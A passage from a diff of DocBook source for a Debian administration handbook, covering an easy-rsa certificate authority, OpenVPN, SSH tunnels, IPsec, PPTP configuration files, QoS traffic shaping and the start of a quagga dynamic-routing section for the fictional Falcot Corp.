+					The Falcot Corp administrators use this tool to create the required certificates, both for the server and the clients. This allows the configuration of all clients to be similar since they will only have to be set up so as to trust certificates coming from Falcot's local CA. This CA is the first certificate to create; to this end, the administrators set up a directory with the files required for the CA in an appropriate location, preferably on a machine not connected to the network in order to mitigate the risk of the CA's private key being stolen.
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>make-cadir pki-falcot
+</userinput><computeroutput>$ </computeroutput><userinput>cd pki-falcot</userinput></screen>
+				 <para>
+					They then store the required parameters into the <filename>vars</filename> file, especially those named with a <literal>KEY_</literal> prefix; these variables are then integrated into the environment:
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>vim vars
+</userinput><computeroutput>$ </computeroutput><userinput>grep KEY_ vars
+</userinput><computeroutput>export KEY_CONFIG=`$EASY_RSA/whichopensslcnf $EASY_RSA`
+export KEY_DIR="$EASY_RSA/keys"
+echo NOTE: If you run ./clean-all, I will be doing a rm -rf on $KEY_DIR
+export KEY_SIZE=2048
+export KEY_EXPIRE=3650
+export KEY_COUNTRY="FR"
+export KEY_PROVINCE="Loire"
+export KEY_CITY="Saint-Étienne"
+export KEY_ORG="Falcot Corp"
+export KEY_EMAIL="admin@falcot.com"
+export KEY_OU="Certificate authority"
+export KEY_NAME="Certificate authority for Falcot Corp"
+# If you'd like to sign all keys with the same Common Name, uncomment the KEY_CN export below
+# export KEY_CN="CommonName"
+$ </computeroutput><userinput>. ./vars
+</userinput><computeroutput>NOTE: If you run ./clean-all, I will be doing a rm -rf on /home/roland/pki-falcot/keys
+$ </computeroutput><userinput>./clean-all
+</userinput></screen>
+				 <para>
+					The next step is the creation of the CA's key pair itself (the two parts of the key pair will be stored under <filename>keys/ca.crt</filename> and <filename>keys/ca.key</filename> during this step):
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>./build-ca</userinput>
+<computeroutput>Generating a 2048 bit RSA private key
+...................................................................+++
+...+++
+writing new private key to 'ca.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [Falcot Corp CA]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+</computeroutput></screen>
+				 <para>
+					The certificate for the VPN server can now be created, as well as the Diffie-Hellman parameters required for the server side of an SSL/TLS connection. The VPN server is identified by its DNS name <literal>vpn.falcot.com</literal>; this name is re-used for the generated key files (<filename>keys/vpn.falcot.com.crt</filename> for the public certificate, <filename>keys/vpn.falcot.com.key</filename> for the private key):
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>./build-key-server vpn.falcot.com
+</userinput><computeroutput>Generating a 2048 bit RSA private key
+.....................................................................................................................+++
+...........+++
+writing new private key to 'vpn.falcot.com.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:
+Common Name (eg, your name or your server's hostname) [vpn.falcot.com]:
+Name [Certificate authority for Falcot Corp]:
+Email Address [admin@falcot.com]:
+
+Please enter the following 'extra' attributes
+to be sent with your certificate request
+A challenge password []:
+An optional company name []:
+Using configuration from /home/roland/pki-falcot/openssl-1.0.0.cnf
+Check that the request matches the signature
+Signature ok
+The Subject's Distinguished Name is as follows
+countryName           :PRINTABLE:'FR'
+stateOrProvinceName   :PRINTABLE:'Loire'
+localityName          :T61STRING:'Saint-\0xFFFFFFC3\0xFFFFFF89tienne'
+organizationName      :PRINTABLE:'Falcot Corp'
+organizationalUnitName:PRINTABLE:'Certificate authority'
+commonName            :PRINTABLE:'vpn.falcot.com'
+name                  :PRINTABLE:'Certificate authority for Falcot Corp'
+emailAddress          :IA5STRING:'admin@falcot.com'
+Certificate is to be certified until Mar  6 14:54:56 2025 GMT (3650 days)
+Sign the certificate? [y/n]:</computeroutput><userinput>y
+</userinput><computeroutput>
+
+1 out of 1 certificate requests certified, commit? [y/n]</computeroutput><userinput>y
+</userinput><computeroutput>Write out database with 1 new entries
+Data Base Updated
+$ </computeroutput><userinput>./build-dh
+</userinput><computeroutput>Generating DH parameters, 2048 bit long safe prime, generator 2
+This is going to take a long time
+[…]
+</computeroutput></screen>
+				 <para>
+					The following step creates certificates for the VPN clients; one certificate is required for each computer or person allowed to use the VPN:
+				</para>
+				 
+<screen>
+<computeroutput>$ </computeroutput><userinput>./build-key JoeSmith
+</userinput><computeroutput>Generating a 2048 bit RSA private key
+................................+++
+..............................................+++
+writing new private key to 'JoeSmith.key'
+-----
+You are about to be asked to enter information that will be incorporated
+into your certificate request.
+What you are about to enter is what is called a Distinguished Name or a DN.
+There are quite a few fields but you can leave some blank
+For some fields there will be a default value,
+If you enter '.', the field will be left blank.
+-----
+Country Name (2 letter code) [FR]:
+State or Province Name (full name) [Loire]:
+Locality Name (eg, city) [Saint-Étienne]:
+Organization Name (eg, company) [Falcot Corp]:
+Organizational Unit Name (eg, section) [Certificate authority]:</computeroutput><userinput>Development unit
+</userinput><computeroutput>Common Name (eg, your name or your server's hostname) [JoeSmith]:</computeroutput><userinput>Joe Smith
+</userinput><computeroutput>[…]</computeroutput></screen>
+				 <para>
+					Now all certificates have been created, they need to be copied where appropriate: the root certificate's public key (<filename>keys/ca.crt</filename>) will be stored on all machines (both server and clients) as <filename>/etc/ssl/certs/Falcot_CA.crt</filename>. The server's certificate is installed only on the server (<filename>keys/vpn.falcot.com.crt</filename> goes to <filename>/etc/ssl/vpn.falcot.com.crt</filename>, and <filename>keys/vpn.falcot.com.key</filename> goes to <filename>/etc/ssl/private/vpn.falcot.com.key</filename> with restricted permissions so that only the administrator can read it), with the corresponding Diffie-Hellman parameters (<filename>keys/dh2048.pem</filename>) installed to <filename>/etc/openvpn/dh2048.pem</filename>. Client certificates are installed on the corresponding VPN client in a similar fashion.
+				</para>
+
+			</section>
+			 <section>
+				<title>Configuring the OpenVPN Server</title>
+				 <para>
+					By default, the OpenVPN initialization script tries starting all virtual private networks defined in <filename>/etc/openvpn/*.conf</filename>. Setting up a VPN server is therefore a matter of storing a corresponding configuration file in this directory. A good starting point is <filename>/usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz</filename>, which leads to a rather standard server. Of course, some parameters need to be adapted: <literal>ca</literal>, <literal>cert</literal>, <literal>key</literal> and <literal>dh</literal> need to describe the selected locations (respectively, <literal>/etc/ssl/certs/Falcot_CA.crt</literal>, <literal>/etc/ssl/vpn.falcot.com.crt</literal>, <literal>/etc/ssl/private/vpn.falcot.com.key</literal> and <literal>/etc/openvpn/dh2048.pem</literal>). The <literal>server 10.8.0.0 255.255.255.0</literal> directive defines the subnet to be used by the VPN; the server uses the first IP address in that range (<literal>10.8.0.1</literal>) and the rest of the addresses are allocated to clients.
+				</para>
+				 <para>
+					With this configuration, starting OpenVPN creates the virtual network interface, usually under the <literal>tun0</literal> name. However, firewalls are often configured at the same time as the real network interfaces, which happens before OpenVPN starts. Good practice therefore recommends creating a persistent virtual network interface, and configuring OpenVPN to use this pre-existing interface. This further allows choosing the name for this interface. To this end, <command>openvpn --mktun --dev vpn --dev-type tun</command> creates a virtual network interface named <literal>vpn</literal> with type <literal>tun</literal>; this command can easily be integrated in the firewall configuration script, or in an <literal>up</literal> directive of the <filename>/etc/network/interfaces</filename> file. The OpenVPN configuration file must also be updated accordingly, with the <literal>dev vpn</literal> and <literal>dev-type tun</literal> directives.
+				</para>
+				 <para>
+					Barring further action, VPN clients can only access the VPN server itself by way of the <literal>10.8.0.1</literal> address. Granting the clients access to the local network (192.168.0.0/24), requires adding a <literal>push route 192.168.0.0 255.255.255.0</literal> directive to the OpenVPN configuration so that VPN clients automatically get a network route telling them that this network is reachable by way of the VPN. Furthermore, machines on the local network also need to be informed that the route to the VPN goes through the VPN server (this automatically works when the VPN server is installed on the gateway). Alternatively, the VPN server can be configured to perform IP masquerading so that connections coming from VPN clients appear as if they are coming from the VPN server instead (see <xref linkend="sect.gateway" />).
+				</para>
+
+			</section>
+			 <section>
+				<title>Configuring the OpenVPN Client</title>
+				 <para>
+					Setting up an OpenVPN client also requires creating a configuration file in <filename>/etc/openvpn/</filename>. A standard configuration can be obtained by using <filename>/usr/share/doc/openvpn/examples/sample-config-files/client.conf</filename> as a starting point. The <literal>remote vpn.falcot.com 1194</literal> directive describes the address and port of the OpenVPN server; the <literal>ca</literal>, <literal>cert</literal> and <literal>key</literal> also need to be adapted to describe the locations of the key files.
+				</para>
+				 <para>
+					If the VPN should not be started automatically on boot, set the <literal>AUTOSTART</literal> directive to <literal>none</literal> in the <filename>/etc/default/openvpn</filename> file. Starting or stopping a given VPN connection is always possible with the commands <command>service openvpn@<replaceable>name</replaceable> start</command> and <command>service openvpn@<replaceable>name</replaceable> stop</command> (where the connection <replaceable>name</replaceable> matches the one defined in <filename>/etc/openvpn/<replaceable>name</replaceable>.conf</filename>).
+				</para>
+				 <para>
+					The <emphasis role="pkg">network-manager-openvpn-gnome</emphasis> package contains an extension to Network Manager (see <xref linkend="sect.roaming-network-config" />) that allows managing OpenVPN virtual private networks. This allows every user to configure OpenVPN connections graphically and to control them from the network management icon. <indexterm><primary><emphasis role="pkg">network-manager-openvpn-gnome</emphasis></primary></indexterm>
+				</para>
+
+			</section>
+
+		</section>
+		 <section id="sect.ssh-vpn">
+			<title>Virtual Private Network with SSH</title>
+			 <indexterm>
+				<primary>SSH</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>PPP</primary>
+			</indexterm>
+			 <para>
+				There are actually two ways of creating a virtual private network with SSH. The historic one involves establishing a PPP layer over the SSH link. This method is described in a HOWTO document: <ulink type="block" url="http://www.tldp.org/HOWTO/ppp-ssh/" />
+			</para>
+			 <para>
+				The second method is more recent, and was introduced with OpenSSH 4.3; it is now possible for OpenSSH to create virtual network interfaces (<literal>tun*</literal>) on both sides of an SSH connection, and these virtual interfaces can be configured exactly as if they were physical interfaces. The tunneling system must first be enabled by setting <literal>PermitTunnel</literal> to “yes” in the SSH server configuration file (<filename>/etc/ssh/sshd_config</filename>). When establishing the SSH connection, the creation of a tunnel must be explicitly requested with the <literal>-w any:any</literal> option (<literal>any</literal> can be replaced with the desired <literal>tun</literal> device number). This requires the user to have administrator privilege on both sides, so as to be able to create the network device (in other words, the connection must be established as root).
+			</para>
+			 <para>
+				Both methods for creating a virtual private network over SSH are quite straightforward. However, the VPN they provide is not the most efficient available; in particular, it does not handle high levels of traffic very well.
+			</para>
+			 <para>
+				The explanation is that when a TCP/IP stack is encapsulated within a TCP/IP connection (for SSH), the TCP protocol is used twice, once for the SSH connection and once within the tunnel. This leads to problems, especially due to the way TCP adapts to network conditions by altering timeout delays. The following site describes the problem in more detail: <ulink type="block" url="http://sites.inka.de/sites/bigred/devel/tcp-tcp.html" /> VPNs over SSH should therefore be restricted to one-off tunnels with no performance constraints.
+			</para>
+
+		</section>
+		 <section id="sect.ipsec">
+			<title>IPsec</title>
+			 <indexterm>
+				<primary>IPsec</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>strongswan</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>racoon</command></primary>
+			</indexterm>
+			 <para>
+				IPsec, despite being the standard in IP VPNs, is rather more involved in its implementation. The IPsec engine itself is integrated in the Linux kernel; the required user-space parts, the control and configuration tools, are provided by the <emphasis role="pkg">ipsec-tools</emphasis> package. In concrete terms, each host's <filename>/etc/ipsec-tools.conf</filename> contains the parameters for <emphasis>IPsec tunnels</emphasis> (or <emphasis>Security Associations</emphasis>, in the IPsec terminology) that the host is concerned with; the <command>/etc/init.d/setkey</command> script provides a way to start and stop a tunnel (each tunnel is a secure link to another host connected to the virtual private network). This file can be built by hand from the documentation provided by the <citerefentry><refentrytitle>setkey</refentrytitle>
+				 <manvolnum>8</manvolnum></citerefentry> manual page. However, explicitly writing the parameters for all hosts in a non-trivial set of machines quickly becomes an arduous task, since the number of tunnels grows fast. Installing an IKE daemon (for <emphasis>IPsec Key Exchange</emphasis>) such as <emphasis role="pkg">racoon</emphasis> or <emphasis role="pkg">strongswan</emphasis> makes the process much simpler by bringing administration together at a central point, and more secure by rotating the keys periodically.
+			</para>
+			 <indexterm>
+				<primary>IKE</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>IPsec</primary>
+				<secondary>IPsec Key Exchange</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>key pair</primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>setkey</command></primary>
+			</indexterm>
+			 <para>
+				In spite of its status as the reference, the complexity of setting up IPsec restricts its usage in practice. OpenVPN-based solutions will generally be preferred when the required tunnels are neither too many nor too dynamic.
+			</para>
+			 <sidebar> <title><emphasis>CAUTION</emphasis> IPsec and NAT</title>
+			 <para>
+				NATing firewalls and IPsec do not work well together: since IPsec signs the packets, any change on these packets that the firewall might perform will void the signature, and the packets will be rejected at their destination. Various IPsec implementations now include the <emphasis>NAT-T</emphasis> technique (for <emphasis>NAT Traversal</emphasis>), which basically encapsulates the IPsec packet within a standard UDP packet.
+			</para>
+			 <indexterm>
+				<primary>NAT-T</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>NAT Traversal</primary>
+			</indexterm>
+			 </sidebar> <sidebar> <title><emphasis>SECURITY</emphasis> IPsec and firewalls</title>
+			 <para>
+				The standard mode of operation of IPsec involves data exchanges on UDP port 500 for key exchanges (also on UDP port 4500 in the case that NAT-T is in use). Moreover, IPsec packets use two dedicated IP protocols that the firewall must let through; reception of these packets is based on their protocol numbers, 50 (ESP) and 51 (AH).
+			</para>
+			 <indexterm>
+				<primary>ESP, protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>AH, protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>protocol</primary>
+				<secondary>AH</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>protocol</primary>
+				<secondary>ESP</secondary>
+			</indexterm>
+			 </sidebar>
+		</section>
+		 <section id="sect.pptp">
+			<title>PPTP</title>
+			 <para>
+				PPTP (for <emphasis>Point-to-Point Tunneling Protocol</emphasis>) uses two communication channels, one for control data and one for payload data; the latter uses the GRE protocol (<emphasis>Generic Routing Encapsulation</emphasis>). A standard PPP link is then set up over the data exchange channel.
+			</para>
+			 <indexterm>
+				<primary>PPTP</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Point-to-Point Tunneling Protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>GRE, protocol</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>protocol</primary>
+				<secondary>GRE</secondary>
+			</indexterm>
+			 <section id="sect.pptp-config-client">
+				<title>Configuring the Client</title>
+				 <para>
+					The <emphasis role="pkg">pptp-linux</emphasis> package contains an easily-configured PPTP client for Linux. The following instructions take their inspiration from the official documentation: <ulink type="block" url="http://pptpclient.sourceforge.net/howto-debian.phtml" />
+				</para>
+				 <indexterm>
+					<primary><emphasis role="pkg">pptp-linux</emphasis></primary>
+				</indexterm>
+				 <para>
+					The Falcot administrators created several files: <filename>/etc/ppp/options.pptp</filename>, <filename>/etc/ppp/peers/falcot</filename>, <filename>/etc/ppp/ip-up.d/falcot</filename>, and <filename>/etc/ppp/ip-down.d/falcot</filename>.
+				</para>
+				 <example id="example.ppp-options.pptp">
+					<title>The <filename>/etc/ppp/options.pptp</filename> file</title>
+					 
+<programlisting>
+# PPP options used for a PPTP connection
+lock
+noauth
+nobsdcomp
+nodeflate
+</programlisting>
+
+				</example>
+				 <example id="example.ppp-peers-falcot">
+					<title>The <filename>/etc/ppp/peers/falcot</filename> file</title>
+					 
+<programlisting>
+# vpn.falcot.com is the PPTP server
+pty "pptp vpn.falcot.com --nolaunchpppd"
+# the connection will identify as the "vpn" user
+user vpn
+remotename pptp
+# encryption is needed
+require-mppe-128
+file /etc/ppp/options.pptp
+ipparam falcot
+</programlisting>
+
+				</example>
+				 <example id="example.ppp-ip-up.d-falcot">
+					<title>The <filename>/etc/ppp/ip-up.d/falcot</filename> file</title>
+					 
+<programlisting>
+# Create the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route add -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</programlisting>
+
+				</example>
+				 <example id="example.ppp-ip-down.d-falcot">
+					<title>The <filename>/etc/ppp/ip-down.d/falcot</filename> file</title>
+					 
+<programlisting>
+# Delete the route to the Falcot network
+if [ "$6" = "falcot" ]; then
+  # 192.168.0.0/24 is the (remote) Falcot network
+  route del -net 192.168.0.0 netmask 255.255.255.0 dev $1
+fi
+</programlisting>
+
+				</example>
+				 <sidebar> <title><emphasis>SECURITY</emphasis> MPPE</title>
+				 <para>
+					Securing PPTP involves using the MPPE feature (<emphasis>Microsoft Point-to-Point Encryption</emphasis>), which is available in official Debian kernels as a module.
+				</para>
+				 <indexterm>
+					<primary>MPPE</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Microsoft</primary>
+					<secondary>Point-to-Point Encryption</secondary>
+				</indexterm>
+				 </sidebar>
+			</section>
+			 <section id="sect.pptp-config-serveur">
+				<title>Configuring the Server</title>
+				 <sidebar> <title><emphasis>CAUTION</emphasis> PPTP and firewalls</title>
+				 <para>
+					Intermediate firewalls need to be configured to let through IP packets using protocol 47 (GRE). Moreover, the PPTP server's port 1723 needs to be open so that the communication channel can happen.
+				</para>
+				 </sidebar> <para>
+					<command>pptpd</command> is the PPTP server for Linux. Its main configuration file, <filename>/etc/pptpd.conf</filename>, requires very few changes: <emphasis>localip</emphasis> (local IP address) and <emphasis>remoteip</emphasis> (remote IP address). In the example below, the PPTP server always uses the <literal>192.168.0.199</literal> address, and PPTP clients receive IP addresses from <literal>192.168.0.200</literal> to <literal>192.168.0.250</literal>.
+				</para>
+				 <example id="example.pptpd.conf">
+					<title>The <filename>/etc/pptpd.conf</filename> file</title>
+					 
+<programlisting>
+# TAG: speed
+#
+#       Specifies the speed for the PPP daemon to talk at.
+#
+speed 115200
+
+# TAG: option
+#
+#       Specifies the location of the PPP options file.
+#       By default PPP looks in '/etc/ppp/options'
+#
+option /etc/ppp/pptpd-options
+
+# TAG: debug
+#
+#       Turns on (more) debugging to syslog
+#
+# debug
+
+# TAG: localip
+# TAG: remoteip
+#
+#       Specifies the local and remote IP address ranges.
+#
+#       You can specify single IP addresses separated by commas or you can
+#       specify ranges, or both. For example:
+#
+#               192.168.0.234,192.168.0.245-249,192.168.0.254
+#
+#       IMPORTANT RESTRICTIONS:
+#
+#       1. No spaces are permitted between commas or within addresses.
+#
+#       2. If you give more IP addresses than MAX_CONNECTIONS, it will
+#          start at the beginning of the list and go until it gets
+#          MAX_CONNECTIONS IPs. Others will be ignored.
+#
+#       3. No shortcuts in ranges! ie. 234-8 does not mean 234 to 238,
+#          you must type 234-238 if you mean this.
+#
+#       4. If you give a single localIP, that's ok - all local IPs will
+#          be set to the given one. You MUST still give at least one remote
+#          IP for each simultaneous client.
+#
+#localip 192.168.0.234-238,192.168.0.245
+#remoteip 192.168.1.234-238,192.168.1.245
+#localip 10.0.1.1
+#remoteip 10.0.1.2-100
+localip 192.168.0.199
+remoteip 192.168.0.200-250
+</programlisting>
+
+				</example>
+				 <para>
+					The PPP configuration used by the PPTP server also requires a few changes in <filename>/etc/ppp/pptpd-options</filename>. The important parameters are the server name (<literal>pptp</literal>), the domain name (<literal>falcot.com</literal>), and the IP addresses for DNS and WINS servers.
+				</para>
+				 <example id="example.ppp-pptpd-options">
+					<title>The <filename>/etc/ppp/pptpd-options</filename> file</title>
+					 
+<programlisting>
+## turn pppd syslog debugging on
+#debug
+
+## change 'servername' to whatever you specify as your server name in chap-secrets
+name pptp
+## change the domainname to your local domain
+domain falcot.com
+
+## these are reasonable defaults for WinXXXX clients
+## for the security related settings
+# The Debian pppd package now supports both MSCHAP and MPPE, so enable them
+# here. Please note that the kernel support for MPPE must also be present!
+auth
+require-chap
+require-mschap
+require-mschap-v2
+require-mppe-128
+
+## Fill in your addresses
+ms-dns 192.168.0.1
+ms-wins 192.168.0.1
+
+## Fill in your netmask
+netmask 255.255.255.0
+
+## some defaults
+nodefaultroute
+proxyarp
+lock
+</programlisting>
+
+				</example>
+				 <para>
+					The last step involves registering the <literal>vpn</literal> user (and the associated password) in the <filename>/etc/ppp/chap-secrets</filename> file. Contrary to other instances where an asterisk (<literal>*</literal>) would work, the server name must be filled explicitly here. Furthermore, Windows PPTP clients identify themselves under the <literal><replaceable>DOMAIN</replaceable>\\<replaceable>USER</replaceable></literal> form, instead of only providing a user name. This explains why the file also mentions the <literal>FALCOT\\vpn</literal> user. It is also possible to specify individual IP addresses for users; an asterisk in this field specifies that dynamic addressing should be used.
+				</para>
+				 <example id="example.ppp-chap-secrets">
+					<title>The <filename>/etc/ppp/chap-secrets</filename> file</title>
+					 
+<programlisting>
+# Secrets for authentication using CHAP
+# client        server  secret      IP addresses
+vpn             pptp    f@Lc3au     *
+FALCOT\\vpn     pptp    f@Lc3au     *
+</programlisting>
+
+				</example>
+				 <sidebar> <title><emphasis>SECURITY</emphasis> PPTP vulnerabilities</title>
+				 <para>
+					Microsoft's first PPTP implementation drew severe criticism because it had many security vulnerabilities; most have since then been fixed in more recent versions. The configuration documented in this section uses the latest version of the protocol. Be aware though that removing some options (such as <literal>require-mppe-128</literal> and <literal>require-mschap-v2</literal>) would make the service vulnerable again.
+				</para>
+				 </sidebar>
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.quality-of-service">
+		<title>Quality of Service</title>
+		 <section id="sect.qos-principe">
+			<title>Principle and Mechanism</title>
+			 <para>
+				<emphasis>Quality of Service</emphasis> (or <emphasis>QoS</emphasis> for short) refers to a set of techniques that guarantee or improve the quality of the service provided to applications. The most popular such technique involves classifying the network traffic into categories, and differentiating the handling of traffic according to which category it belongs to. The main application of this differentiated services concept is <emphasis>traffic shaping</emphasis>, which limits the data transmission rates for connections related to some services and/or hosts so as not to saturate the available bandwidth and starve important other services. Traffic shaping is a particularly good fit for TCP traffic, since this protocol automatically adapts to available bandwidth.
+			</para>
+			 <indexterm>
+				<primary>QoS</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>quality of service</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>quality</primary>
+				<secondary>of service</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>service</primary>
+				<secondary>quality</secondary>
+			</indexterm>
+			 <para>
+				It is also possible to alter the priorities on traffic, which allows prioritizing packets related to interactive services (such as <command>ssh</command> and <command>telnet</command>) or to services that only deal with small blocks of data.
+			</para>
+			 <para>
+				The Debian kernels include the features required for QoS along with their associated modules. These modules are many, and each of them provides a different service, most notably by way of special schedulers for the queues of IP packets; the wide range of available scheduler behaviors spans the whole range of possible requirements.
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> LARTC — <emphasis>Linux Advanced Routing &amp; Traffic Control</emphasis></title>
+			 <para>
+				The <emphasis>Linux Advanced Routing &amp; Traffic Control</emphasis> HOWTO is the reference document covering everything there is to know about network quality of service. <ulink type="block" url="http://www.lartc.org/howto/" />
+			</para>
+			 <indexterm>
+				<primary>routing</primary>
+				<secondary>advanced</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>traffic</primary>
+				<secondary>control</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>control of traffic</primary>
+			</indexterm>
+			 </sidebar>
+		</section>
+		 <section id="sect.qos-config">
+			<title>Configuring and Implementing</title>
+			 <para>
+				QoS parameters are set through the <command>tc</command> command (provided by the <emphasis role="pkg">iproute</emphasis> package). Since its interface is quite complex, using higher-level tools is recommended.
+			</para>
+			 <indexterm>
+				<primary><emphasis>iproute</emphasis></primary>
+			</indexterm>
+			 <indexterm>
+				<primary><command>tc</command></primary>
+			</indexterm>
+			 <section id="sect.qos-wondershaper">
+				<title>Reducing Latencies: <command>wondershaper</command></title>
+				 <para>
+					The main purpose of <command>wondershaper</command> (in the similarly-named package) is to minimize latencies independent of network load. This is achieved by limiting total traffic to a value that falls just short of the link saturation value.
+				</para>
+				 <indexterm>
+					<primary><command>wondershaper</command></primary>
+				</indexterm>
+				 <indexterm>
+					<primary>limitation of traffic</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>traffic</primary>
+					<secondary>limitation</secondary>
+				</indexterm>
+				 <para>
+					Once a network interface is configured, setting up this traffic limitation is achieved by running <command>wondershaper <replaceable>interface</replaceable> <replaceable>download_rate</replaceable> <replaceable>upload_rate</replaceable></command>. The interface can be <literal>eth0</literal> or <literal>ppp0</literal> for example, and both rates are expressed in kilobits per second. The <command>wondershaper remove <replaceable>interface</replaceable></command> command disables traffic control on the specified interface.
+				</para>
+				 <para>
+					For an Ethernet connection, this script is best called right after the interface is configured. This is done by adding <literal>up</literal> and <literal>down</literal> directives to the <filename>/etc/network/interfaces</filename> file allowing declared commands to be run, respectively, after the interface is configured and before it is deconfigured. For example:
+				</para>
+				 <example id="example.network-interfaces">
+					<title>Changes in the <filename>/etc/network/interfaces</filename> file</title>
+					 
+<programlisting>
+iface eth0 inet dhcp
+    up /sbin/wondershaper eth0 500 100
+    down /sbin/wondershaper remove eth0
+</programlisting>
+
+				</example>
+				 <para>
+					In the PPP case, creating a script that calls <command>wondershaper</command> in <filename>/etc/ppp/ip-up.d/</filename> will enable traffic control as soon as the connection is up.
+				</para>
+				 <sidebar> <title><emphasis>GOING FURTHER</emphasis> Optimal configuration</title>
+				 <para>
+					The <filename>/usr/share/doc/wondershaper/README.Debian.gz</filename> file describes, in some detail, the configuration method recommended by the package maintainer. In particular, it advises measuring the download and upload speeds so as to best evaluate real limits.
+				</para>
+				 </sidebar>
+			</section>
+			 <section id="sect.qos-config-standard">
+				<title>Standard Configuration</title>
+				 <para>
+					Barring a specific QoS configuration, the Linux kernel uses the <literal>pfifo_fast</literal> queue scheduler, which provides a few interesting features by itself. The priority of each processed IP packet is based on the ToS field (<emphasis>Type of Service</emphasis>) of this packet; modifying this field is enough to take advantage of the scheduling features. There are five possible values:
+				</para>
+				 <itemizedlist>
+					<listitem>
+						<para>
+							Normal-Service (0);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Minimize-Cost (2);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Maximize-Reliability (4);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Maximize-Throughput (8);
+						</para>
+
+					</listitem>
+					 <listitem>
+						<para>
+							Minimize-Delay (16).
+						</para>
+
+					</listitem>
+
+				</itemizedlist>
+				 <indexterm>
+					<primary>ToS</primary>
+				</indexterm>
+				 <indexterm>
+					<primary>Type of Service</primary>
+				</indexterm>
+				 <para>
+					The ToS field can be set by applications that generate IP packets, or modified on the fly by <emphasis>netfilter</emphasis>. The following rules are sufficient to increase responsiveness for a server's SSH service:
+				</para>
+				 
+<programlisting role="scale">
+iptables -t mangle -A PREROUTING -p tcp --sport ssh -j TOS --set-tos Minimize-Delay
+iptables -t mangle -A PREROUTING -p tcp --dport ssh -j TOS --set-tos Minimize-Delay
+</programlisting>
+
+			</section>
+
+		</section>
+
+	</section>
+	 <section id="sect.dynamic-routing">
+		<title>Dynamic Routing</title>
+		 <indexterm>
+			<primary>routing</primary>
+			<secondary>dynamic</secondary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>quagga</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>zebra</command></primary>
+		</indexterm>
+		 <para>
+			The reference tool for dynamic routing is currently <command>quagga</command>, from the similarly-named package; it used to be <command>zebra</command> until development of the latter stopped. However, <command>quagga</command> kept the names of the programs for compatibility reasons which explains the <command>zebra</command> commands below.
+		</para>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Dynamic routing</title>
+		 <para>
+			Dynamic routing allows routers to adjust, in real time, the paths used for transmitting IP packets. Each protocol involves its own method of defining routes (shortest path, use routes advertised by peers, and so on).
+		</para>
+		 <para>
+			In the Linux kernel, a route links a network device to a set of machines that can be reached through this device. The <command>route</command> command defines new routes and displays existing ones.
+		</para>
+		 <indexterm>
+			<primary><command>route</command></primary>
+		</indexterm>
+		 </sidebar> <para>
+			Quagga is a set of daemons cooperating to define the routing tables to be used by the Linux kernel; each routing protocol (most notably BGP, OSPF and RIP) provides its own daemon. The <command>zebra</command> daemon collects information from other daemons and handles static routing tables accordingly. The other daemons are known as <command>bgpd</command>, <command>ospfd</command>, <command>ospf6d</command>, <command>ripd</command>, <command>ripngd</command>, <command>isisd</command>, and <command>babeld</command>.
+		</para>
+		 <indexterm>
+			<primary>OSPF</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>BGP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>RIP</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>IS-IS</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>BABEL wireless mesh routing</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>bgpd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ospfd</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ospf6d</command></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><command>ripd</command></primary>
+		</indexterm>
